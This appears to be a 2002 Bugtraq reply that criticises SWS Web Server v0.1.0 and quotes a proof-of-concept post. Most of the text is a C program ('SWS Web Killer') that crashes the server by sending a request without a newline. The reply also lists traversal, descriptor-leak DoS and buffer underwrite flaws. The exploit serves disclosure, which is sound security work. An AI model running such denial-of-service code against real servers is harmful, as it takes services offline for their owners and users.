Dear saman@hush.com, I don't believe this is largest problem of this "webserver"... There is a lot of others: 1. Directory traversal (../) (it never drops root priveleges it needs to bind to TCP/80). 2. It never closes file descriptor for 404 document, so it can be used to DoS remote system completely by repeating request to nonexistent document.. 3. It allows only 1 connection in time and never timeouts. 4. If recv() fails it will overwrite 1 byte before allocated buffer and repeat previous query. If first recv() fails it will try to do some action on uninitialized heap data. One should be completely nuts to use it because there's too many bugs for 130 lines of code :) --Monday, September 2, 2002, 10:04:23 PM, you wrote to bugtraq@securityfocus.org: shc> -----BEGIN PGP SIGNED MESSAGE----- shc> Hash: SHA1 shc> /* shc> * Mon Sep 2 17:45:04 2002 shc> * shc> * |SaMaN| aka Mert <saman@hush.com> shc> * shc> * Information : Anyone can kill SWS Web Server v0.1.0 remotely. shc> * shc> * Proof of Concept Exploit for SWS Web Server v0.1.0 shc> * shc> * SWS homepage : http://www.linuxprogramlama.com shc> * shc> * Tested on : Slackware 8.1 - 2.4.18 shc> * : Redhat 7.0 - 2.2.16-22 shc> * shc> * Problem : sws_web_server.c shc> * : line 108 shc> * : if (recvBuffer[i - 1] != '\n') break; shc> * shc> * Q : So what will happen when we send a string not end with '\n' ? shc> * A : break break break shc> * Q : So root should restart web server everytime ? shc> * A : Yes shc> * Q : Other web servers act like this ? shc> * A : No shc> * Q : So something is wrong ? shc> * A : Yes :) shc> * shc> */ shc> #include <stdio.h> shc> #include <stdlib.h> shc> #include <unistd.h> shc> #include <errno.h> shc> #include <string.h> shc> #include <netdb.h> shc> #include <sys/types.h> shc> #include <netinet/in.h> shc> #include <sys/socket.h> shc> #define K "\033[1;31m" shc> #define Y "\033[1;32m" shc> #define SA "\033[1;33m" shc> #define M "\033[1;34m" shc> #define PORT 80 shc> int main(int argc, char *argv[]) shc> { shc> int sockfd, numbytes; shc> struct hostent *adres; shc> struct sockaddr_in hedef; shc> char buf[8] = "|SaMaN|"; shc> if (argc != 2) { shc> printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K); shc> printf("%sSWS Web Killer (saman@hush.com) \n", SA); shc> printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K); shc> printf("%sUsage: ./sws_web_killer %s<IP> \n",Y,M); shc> return 0; shc> } shc> if ((adres=gethostbyname(argv[1])) == NULL) { shc> perror("gethostbyname"); shc> exit(1); shc> } shc> if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { shc> perror("socket"); shc> exit(1); shc> } shc> hedef.sin_family = AF_INET; shc> hedef.sin_port = htons(PORT); shc> hedef.sin_addr = *((struct in_addr *)adres->h_addr); shc> memset(&(hedef.sin_zero), '\0', 8); shc> if (connect(sockfd, (struct sockaddr *)&hedef, shc> sizeof(struct sockaddr)) == -1) shc> { shc> perror("connect"); shc> exit(1); shc> } shc> if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) { shc> perror("send"); shc> exit(1); shc> } shc> close(sockfd); shc> return 0; shc> } shc> -----BEGIN PGP SIGNATURE----- shc> Version: Hush 2.1 shc> Note: This signature can be verified at https://www.hushtools.com shc> wlYEARECABYFAj1zqVwPHHNhbWFuQGh1c2guY29tAAoJEAH/SwbH8cXFjRIAniyG5sTp shc> 9dPQOfCYbPdtlwHYawc8AKCSvQ23yBZszI97DmMt+maxaqgqOg== shc> =tmWT shc> -----END PGP SIGNATURE----- shc> Get your free encrypted email at https://www.hushmail.com -- ~/ZARAZA Таким образом этот путь дешевле и к нему легче добраться тому, кто в состоянии до него добраться. (Твен)
